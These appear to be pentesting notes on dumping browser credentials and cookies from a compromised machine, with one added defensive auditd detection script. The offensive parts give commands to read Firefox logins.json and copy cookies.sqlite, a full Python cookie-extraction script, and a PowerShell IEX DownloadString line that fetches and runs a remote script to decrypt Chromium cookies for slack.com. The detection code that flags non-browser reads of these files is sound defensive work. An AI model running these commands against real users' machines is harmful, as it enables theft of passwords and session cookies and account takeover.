Pentesting Browsers

Dumping memory and cache: focus on credentials

mimipenguin, LaZagne

Firefox stored credentials:

ls -l .mozilla/firefox/ | grep default 

cat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .

The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

Dumping data from session, local data and others

HackBrowserData

HackBrowserData is a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks, credit cards, download history, localStorage and extensions) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

We can copy the file to our machine and use the Python script cookieextractor.py to extract cookies from the Firefox cookies.sqlite database.

This is the script:

#!/usr/bin/env python3
# Sample script to extract cookies offline from a Firefox SQLite database
# Created by PlainText

import argparse
import sqlite3


def main(dbpath, host, cookie):
    conn = sqlite3.connect(dbpath)
    cursor = conn.cursor()

    # Build the WHERE clause from the optional filters. Values are bound as
    # parameters instead of being formatted into the SQL string, so quotes
    # in --host or --cookie cannot break or alter the query.
    clauses = []
    params = []
    if cookie != "":
        clauses.append("name LIKE ?")
        params.append("%{}%".format(cookie))
    if host != "":
        clauses.append("host LIKE ?")
        params.append("%{}%".format(host))

    query = "SELECT * FROM moz_cookies"
    if clauses:
        query += " WHERE " + " AND ".join(clauses)

    cursor.execute(query, params)
    records = cursor.fetchall()

    if len(records) > 0:
        for row in records:
            print(row)
    else:
        print("[-] No cookie found with the selected options.")

    conn.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--dbpath", "-d", required=True, help="The path to the sqlite cookies database")
    parser.add_argument("--host", "-o", required=False, help="The host for the cookie", default="")
    parser.add_argument("--cookie", "-c", required=False, help="The name of the cookie", default="")
    args = parser.parse_args()
    main(args.dbpath, args.host, args.cookie)

python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d
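
Seen from the defending side, reads of logins.json and cookies.sqlite like the ones above stand out when the process touching them is not the browser. The following is an added example (not part of the original notes or of any tool mentioned here) that correlates Linux auditd SYSCALL and PATH records and reports non-browser access; the audit key `browser_creds`, the Firefox binary path and the log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed auditd records (not from a real host). They assume a file watch on
# the Firefox profile directory tagged with the hypothetical key "browser_creds".
SAMPLE_AUDIT_LOG = '''\
type=SYSCALL msg=audit(1714000000.101:501): syscall=257 success=yes pid=2210 uid=1000 comm="firefox" exe="/usr/lib/firefox/firefox" key="browser_creds"
type=PATH msg=audit(1714000000.101:501): item=0 name="/home/alice/.mozilla/firefox/abcd1234.default-release/cookies.sqlite" nametype=NORMAL
type=SYSCALL msg=audit(1714000042.250:502): syscall=257 success=yes pid=3377 uid=1000 comm="python3" exe="/usr/bin/python3.11" key="browser_creds"
type=PATH msg=audit(1714000042.250:502): item=0 name="/home/alice/.mozilla/firefox/abcd1234.default-release/logins.json" nametype=NORMAL
type=SYSCALL msg=audit(1714000050.007:503): syscall=257 success=yes pid=3390 uid=1000 comm="cp" exe="/usr/bin/cp" key="browser_creds"
type=PATH msg=audit(1714000050.007:503): item=0 name="/home/alice/.mozilla/firefox/abcd1234.default-release/cookies.sqlite" nametype=NORMAL
type=SYSCALL msg=audit(1714000060.000:504): syscall=257 success=yes pid=3401 uid=1000 comm="cat" exe="/usr/bin/cat" key="browser_creds"
type=PATH msg=audit(1714000060.000:504): item=0 name="/home/alice/.mozilla/firefox/abcd1234.default-release/prefs.js" nametype=NORMAL
'''

SENSITIVE = {"logins.json", "key4.db", "cookies.sqlite"}  # Firefox credential/cookie stores
BROWSER_EXES = {"/usr/lib/firefox/firefox"}  # assumption: adjust to the local install path
EVENT_ID = re.compile(r"msg=audit\(([\d.]+:\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def find_suspicious_reads(log_text, key="browser_creds"):
    """Return (event_id, exe, pid, path) for non-browser access to sensitive files."""
    events = defaultdict(lambda: {"paths": []})
    for line in log_text.splitlines():
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD.findall(line)}
        ev = events[m.group(1)]  # records of one event share timestamp:serial
        if fields.get("type") == "SYSCALL":
            ev.update(exe=fields.get("exe"), pid=fields.get("pid"), key=fields.get("key"))
        elif fields.get("type") == "PATH":
            ev["paths"].append(fields.get("name", ""))
    alerts = []
    for event_id, ev in events.items():
        if ev.get("key") != key or ev.get("exe") in BROWSER_EXES:
            continue
        for path in ev["paths"]:
            if path.rsplit("/", 1)[-1] in SENSITIVE:
                alerts.append((event_id, ev["exe"], ev["pid"], path))
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious_reads(SAMPLE_AUDIT_LOG):
        print("[!] non-browser access:", alert)
```
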

Chromium-based browsers also store their cookie information in an SQLite database. The only difference is that the cookie value is encrypted with the Data Protection API (DPAPI). DPAPI is commonly used to encrypt data using information from the current user account or computer.

To get the cookie value, we'll need to perform a decryption routine from the session of the user we compromised.

SharpChromium does what we need: it connects to the current user's SQLite cookie database, decrypts the cookie value, and presents the result in JSON format.

Let's use Invoke-SharpChromium, a PowerShell script created by S3cur3Th1sSh1t which uses reflection to load SharpChromium.

PowerShell Script - Invoke-SharpChromium

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')

Invoke-SharpChromium -Command "cookies slack.com"
Last update: 2025-04-24
Created: July 15, 2023 17:03:48